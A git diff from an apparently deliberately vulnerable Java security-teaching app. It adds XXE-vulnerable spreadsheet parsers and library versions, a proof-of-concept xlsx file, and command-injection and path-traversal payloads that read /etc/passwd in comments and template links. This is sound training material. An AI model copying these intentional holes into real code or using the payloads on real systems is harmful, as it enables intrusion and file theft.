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
CcS!R9

literal 0
HcmV?d00001

diff --git a/pom.xml b/pom.xml
index 5f39a0bc..65c1d5bf 100644
--- a/pom.xml
+++ b/pom.xml
@@ -196,6 +196,26 @@
             <version>1.4.10</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.apache.poi</groupId>
+            <artifactId>poi</artifactId>
+            <version>3.10-FINAL</version>
+        </dependency>
+
+        <!-- vuln maven jar. Solve xlsx.-->
+        <dependency>
+            <groupId>org.apache.poi</groupId>
+            <artifactId>poi-ooxml</artifactId>
+            <version>3.10-FINAL</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.monitorjbl</groupId>
+            <artifactId>xlsx-streamer</artifactId>
+            <version>2.0.0</version>
+        </dependency>
+
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/controller/CommandInject.java b/src/main/java/org/joychou/controller/CommandInject.java
index 758df64a..bf4f6515 100644
--- a/src/main/java/org/joychou/controller/CommandInject.java
+++ b/src/main/java/org/joychou/controller/CommandInject.java
@@ -16,7 +16,7 @@ public class CommandInject {
     protected final Logger logger = LoggerFactory.getLogger(this.getClass());
 
     /**
-     * http://localhost:8080/codeinject?filepath=/tmp;pwd
+     * http://localhost:8080/codeinject?filepath=/tmp;cat /etc/passwd
      *
      * @param filepath filepath
      * @return result
@@ -33,7 +33,7 @@ public static String codeInject(String filepath) throws IOException {
 
     /**
      * Host Injection
-     * host: Host: hacked by joychou;curl ssrf.http.joychou.org
+     * Host: hacked by joychou;cat /etc/passwd
      * http://localhost:8080/codeinject/host
      *
      */
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index e5ea009e..79133f16 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -1,9 +1,9 @@
 package org.joychou.controller;
 
-
 import org.dom4j.io.SAXReader;
 import org.springframework.web.bind.annotation.*;
 import javax.servlet.http.HttpServletRequest;
+
 import org.w3c.dom.Document;
 import org.w3c.dom.Node;
 import org.w3c.dom.NodeList;
@@ -37,7 +37,7 @@ public String xxe_xmlReader(HttpServletRequest request) {
             String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
             XMLReader xmlReader = XMLReaderFactory.createXMLReader();
-            xmlReader.parse( new InputSource(new StringReader(xml_con)) );  // parse xml
+            xmlReader.parse(new InputSource(new StringReader(xml_con)));  // parse xml
             return "ok";
         } catch (Exception e) {
             System.out.println(e);
@@ -47,7 +47,7 @@ public String xxe_xmlReader(HttpServletRequest request) {
 
 
     @RequestMapping(value = "/xmlReader_fix", method = RequestMethod.POST)
-    public  String xxe_xmlReader_fix(HttpServletRequest request) {
+    public String xxe_xmlReader_fix(HttpServletRequest request) {
         try {
             String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
@@ -58,7 +58,7 @@ public  String xxe_xmlReader_fix(HttpServletRequest request) {
             xmlReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
             xmlReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
             //fix code end
-            xmlReader.parse( new InputSource(new StringReader(xml_con)) );  // parse xml
+            xmlReader.parse(new InputSource(new StringReader(xml_con)));  // parse xml
 
             return "ok";
         } catch (Exception e) {
@@ -69,13 +69,13 @@ public  String xxe_xmlReader_fix(HttpServletRequest request) {
 
 
     @RequestMapping(value = "/SAXBuilder", method = RequestMethod.POST)
-    public  String xxe_SAXBuilder(HttpServletRequest request) {
+    public String xxe_SAXBuilder(HttpServletRequest request) {
         try {
             String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXBuilder builder = new SAXBuilder();
-            org.jdom2.Document document = builder.build( new InputSource(new StringReader(xml_con)) );  // cause xxe
+            org.jdom2.Document document = builder.build(new InputSource(new StringReader(xml_con)));  // cause xxe
             return "ok";
         } catch (Exception e) {
             System.out.println(e);
@@ -84,7 +84,7 @@ public  String xxe_SAXBuilder(HttpServletRequest request) {
     }
 
     @RequestMapping(value = "/SAXBuilder_fix", method = RequestMethod.POST)
-    public  String xxe_SAXBuilder_fix(HttpServletRequest request) {
+    public String xxe_SAXBuilder_fix(HttpServletRequest request) {
         try {
             String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
@@ -93,7 +93,7 @@ public  String xxe_SAXBuilder_fix(HttpServletRequest request) {
             builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
             builder.setFeature("http://xml.org/sax/features/external-general-entities", false);
             builder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
-            org.jdom2.Document document = builder.build( new InputSource(new StringReader(xml_con)) );
+            org.jdom2.Document document = builder.build(new InputSource(new StringReader(xml_con)));
 
             return "ok";
         } catch (Exception e) {
@@ -102,13 +102,13 @@ public  String xxe_SAXBuilder_fix(HttpServletRequest request) {
     }
 
     @RequestMapping(value = "/SAXReader", method = RequestMethod.POST)
-    public  String xxe_SAXReader(HttpServletRequest request) {
+    public String xxe_SAXReader(HttpServletRequest request) {
         try {
             String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXReader reader = new SAXReader();
-            org.dom4j.Document document = reader.read(  new InputSource(new StringReader(xml_con)) ); // cause xxe
+            org.dom4j.Document document = reader.read(new InputSource(new StringReader(xml_con))); // cause xxe
 
             return "ok";
         } catch (Exception e) {
@@ -118,7 +118,7 @@ public  String xxe_SAXReader(HttpServletRequest request) {
     }
 
     @RequestMapping(value = "/SAXReader_fix", method = RequestMethod.POST)
-    public  String xxe_SAXReader_fix(HttpServletRequest request) {
+    public String xxe_SAXReader_fix(HttpServletRequest request) {
         try {
             String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
@@ -127,7 +127,7 @@ public  String xxe_SAXReader_fix(HttpServletRequest request) {
             reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
             reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
             reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
-            org.dom4j.Document document = reader.read(  new InputSource(new StringReader(xml_con)) );
+            org.dom4j.Document document = reader.read(new InputSource(new StringReader(xml_con)));
 
             return "ok";
         } catch (Exception e) {
@@ -231,7 +231,7 @@ public String xxeDocumentBuilderReturn(HttpServletRequest request) {
                 NodeList child = rootNode.getChildNodes();
                 for (int j = 0; j < child.getLength(); j++) {
                     Node node = child.item(j);
-                    buf.append( node.getNodeName() + ": " + node.getTextContent() + "\n" );
+                    buf.append(node.getNodeName() + ": " + node.getTextContent() + "\n");
                 }
             }
             sr.close();
@@ -265,8 +265,8 @@ public String DocumentBuilder(HttpServletRequest request) {
                 for (int j = 0; j < child.getLength(); j++) {
                     Node node = child.item(j);
                     // 正常解析XML，需要判断是否是ELEMENT_NODE类型。否则会出现多余的的节点。
-                    if(child.item(j).getNodeType() == Node.ELEMENT_NODE) {
-                        result.append( node.getNodeName() + ": " + node.getFirstChild().getNodeValue() + "\n" );
+                    if (child.item(j).getNodeType() == Node.ELEMENT_NODE) {
+                        result.append(node.getNodeName() + ": " + node.getFirstChild().getNodeValue() + "\n");
                     }
                 }
             }
@@ -387,7 +387,7 @@ public String XMLReaderVul(HttpServletRequest request) {
             SAXParserFactory spf = SAXParserFactory.newInstance();
             SAXParser saxParser = spf.newSAXParser();
             XMLReader xmlReader = saxParser.getXMLReader();
-            xmlReader.parse( new InputSource(new StringReader(xml_con)) );
+            xmlReader.parse(new InputSource(new StringReader(xml_con)));
             return "test";
         } catch (Exception e) {
             System.out.println(e.toString());
@@ -407,7 +407,7 @@ public String XMLReaderSec(HttpServletRequest request) {
             xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
             xmlReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
             xmlReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
-            xmlReader.parse( new InputSource(new StringReader(xml_con)) );
+            xmlReader.parse(new InputSource(new StringReader(xml_con)));
             return "test";
         } catch (Exception e) {
             System.out.println(e.toString());
@@ -415,4 +415,9 @@ public String XMLReaderSec(HttpServletRequest request) {
         }
     }
 
+
+    public static void main(String[] args) throws Exception {
+
+    }
+
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java b/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java
new file mode 100644
index 00000000..6a17e366
--- /dev/null
+++ b/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java
@@ -0,0 +1,79 @@
+package org.joychou.controller.othervulns;
+
+import org.apache.poi.xssf.usermodel.XSSFCell;
+import org.apache.poi.xssf.usermodel.XSSFRow;
+import org.apache.poi.xssf.usermodel.XSSFSheet;
+import org.apache.poi.xssf.usermodel.XSSFWorkbook;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.multipart.MultipartFile;
+
+import java.io.IOException;
+import java.util.Iterator;
+
+import static org.apache.commons.lang.StringUtils.isBlank;
+
+/**
+ * Desc:   poi-ooxml xxe vuln code
+ * Usage:  [Content_Type].xml
+ * Ref:    https://www.itread01.com/hkpcyyp.html
+ * Fix:    Update poi-ooxml to 3.15 or above.
+ * Vuln:   3.10 or below exist xxe vuln. 3.14 or above exist dos vuln. So 3.15 or above is safe version.
+ *
+ * @author JoyChou @2019-09-05
+ */
+@Controller
+@RequestMapping("ooxml")
+public class ooxmlXXE {
+
+
+    private final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+
+    @GetMapping("/upload")
+    public String index() {
+        return "xxe_upload"; // return xxe_upload.html page
+    }
+
+
+    @PostMapping("/readxlsx")
+    @ResponseBody
+    public String ooxml_xxe(MultipartFile file)throws IOException {
+        XSSFWorkbook wb = new XSSFWorkbook(file.getInputStream()); // xxe vuln
+
+        XSSFSheet sheet = wb.getSheetAt(0);
+        XSSFRow row;
+        XSSFCell cell;
+
+        Iterator rows = sheet.rowIterator();
+        String result = "";
+
+        while (rows.hasNext())
+        {
+            row=(XSSFRow) rows.next();
+            Iterator cells = row.cellIterator();
+            while (cells.hasNext())
+            {
+                cell=(XSSFCell) cells.next();
+
+                if (cell.getCellType() == XSSFCell.CELL_TYPE_STRING) {
+                    result += cell.getStringCellValue()+ " ";
+                } else if(cell.getCellType() == XSSFCell.CELL_TYPE_NUMERIC) {
+                    result += cell.getNumericCellValue()+ " ";
+                } else {
+                    logger.info("errors");
+                }
+            }
+        }
+        if ( isBlank(result) ){
+            result = "xxe test";
+        }
+
+        return result;
+    }
+}
diff --git a/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java b/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
new file mode 100644
index 00000000..4ca4bf2f
--- /dev/null
+++ b/src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
@@ -0,0 +1,44 @@
+package org.joychou.controller.othervulns;
+
+import com.monitorjbl.xlsx.StreamingReader;
+import org.apache.poi.ss.usermodel.Workbook;
+
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.multipart.MultipartFile;
+
+import java.io.FileInputStream;
+import java.io.IOException;
+
+
+/**
+ * Desc:  xlsx-streamer xxe vuln code
+ * Usage: xl/workbook.xml
+ * Ref:   https://www.itread01.com/hkpcyyp.html
+ * Fix:   update xlsx-streamer to 2.1.0 or above
+ *
+ * @author JoyChou @2019-09-05
+ */
+@Controller
+@RequestMapping("xlsx-streamer")
+public class xlsxStreamerXXE {
+
+
+    @GetMapping("/upload")
+    public String index() {
+        return "xxe_upload"; // return xxe_upload.html page
+    }
+
+
+    @PostMapping("/readxlsx")
+    public void xllx_streamer_xxe(MultipartFile file)throws IOException {
+        Workbook wb = StreamingReader.builder().open(file.getInputStream());
+    }
+
+
+    public static void main(String[] args) throws Exception {
+        Workbook wb = StreamingReader.builder().open((new FileInputStream("poc.xlsx")));
+    }
+}
diff --git a/src/main/java/org/joychou/security/LoginSuccessHandler.java b/src/main/java/org/joychou/security/LoginSuccessHandler.java
index 2a81afa2..75765b02 100644
--- a/src/main/java/org/joychou/security/LoginSuccessHandler.java
+++ b/src/main/java/org/joychou/security/LoginSuccessHandler.java
@@ -1,15 +1,22 @@
 package org.joychou.security;
 
+import com.alibaba.fastjson.JSON;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.http.MediaType;
 import org.springframework.security.core.Authentication;
 import org.springframework.security.web.authentication.AuthenticationSuccessHandler;
+import org.springframework.security.web.savedrequest.DefaultSavedRequest;
+import org.springframework.security.web.savedrequest.HttpSessionRequestCache;
+import org.springframework.security.web.savedrequest.SavedRequest;
+
 import javax.servlet.ServletException;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
-
+import java.net.URI;
+import java.util.HashMap;
+import java.util.Map;
 
 
 public class LoginSuccessHandler implements AuthenticationSuccessHandler {
@@ -23,8 +30,17 @@ public void onAuthenticationSuccess(HttpServletRequest request,
 
         logger.info("USER " + authentication.getName()+ " LOGIN SUCCESS.");
 
+        SavedRequest savedRequest = new HttpSessionRequestCache().getRequest(request, response);
+        if (savedRequest != null) {
+            logger.info("Original url is: " + savedRequest.getRedirectUrl());
+        }
+
+        Map<String, String> content = new HashMap<>();
+        content.put("code", "0");
+        content.put("message", "Login success");
+
         // google ajax and sendRedirect
         response.setContentType(MediaType.APPLICATION_JSON_VALUE);
-        response.getWriter().write("{\"code\":0, \"message\":\"Login success\"}");
+        response.getWriter().write(JSON.toJSONString(content));
     }
 }
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 15b78a69..cab90aad 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -8,7 +8,7 @@
     <p>Hello <span th:text="${user}"></span>.</p>
     <p>Welcome to login java-sec-code application. <a th:href="@{/appInfo}">Application Infomation</a></p>
     <p>
-        <a th:href="@{/codeinject?filepath=/tmp;pwd}">CmdInject</a>&nbsp;&nbsp;
+        <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
         <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
         <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
         <a th:href="@{/sqli/jdbc/vul?username=joychou}">SqlInject</a>&nbsp;&nbsp;
@@ -17,5 +17,6 @@
     </p>
     <p>...</p>
     <a th:href="@{/logout}">logout</a>
+
 </body>
 </html>
\ No newline at end of file
diff --git a/src/main/resources/templates/login.html b/src/main/resources/templates/login.html
index f5c4f7f2..1b069872 100644
--- a/src/main/resources/templates/login.html
+++ b/src/main/resources/templates/login.html
@@ -51,9 +51,9 @@
             data: { "username": username, "password": password, "remember-me": remember_me},
             dataType: "json",
             success: function (r) {
-                if (r.code == 0) {
+                if (r.code == "0") {
                     // alert(r.message);
-                    location.href = ctx + 'index';
+                    location.href = ctx + "index";
                 } else {
                     alert(r.message);
                 }
diff --git a/src/main/resources/templates/xxe_upload.html b/src/main/resources/templates/xxe_upload.html
new file mode 100644
index 00000000..d58426f0
--- /dev/null
+++ b/src/main/resources/templates/xxe_upload.html
@@ -0,0 +1,14 @@
+<!DOCTYPE html>
+<html xmlns:th="http://www.thymeleaf.org">
+<body>
+
+<h3>xlsx xxe test page</h3>
+
+<form method="POST" action="readxlsx" enctype="multipart/form-data">
+    <input type="file" name="file" /><br/><br/>
+    <input type="hidden" th:name="${_csrf.parameterName}" th:value="${_csrf.token}" />
+    <input type="submit" value="Submit" />
+</form>
+
+</body>
+</html>
diff --git a/xxe.xlsx b/xxe.xlsx
new file mode 100644
index 0000000000000000000000000000000000000000..1146b47842890899263e3f551cdd0805b45fd6c1
GIT binary patch
literal 9049
zcmeHtg;yNe_I2a#?(Q@e+$DiP;}(Jj_r~2xLK8H&Yp~$K-JReN+(U5JAmP`UdGpOo
zX1>4Rz3R29R<Evos;lnacb|Jsse<6(@d1bcWB>p_128$turh=J0N%p`0C)goSUnjB
zu&X)P)kxFJ(cHy=!_(f5Iu{<6IU4{AJ^z2(fAJG2jUQI-=E8n<{rq0$D^OvnN)nmx
zFt{I=RZYC3C$6v9R4>!o`Z4p}9kz51fsMc?+_5Dep3@PlDzJTBaA;q%I(m4}K!=tg
znE+>R{{cfg5lO7G?#ttBd@@OH5+kEXi!?y8Q+>BO@6&ZDg;G*00z&b?&5VV9ZJgD<
zM)YFcBB6oB&NXH26&%5#k5ky26L`}$)+|1T=bJ!z_;6aEB|>+@d{r794HgsiM(5ik
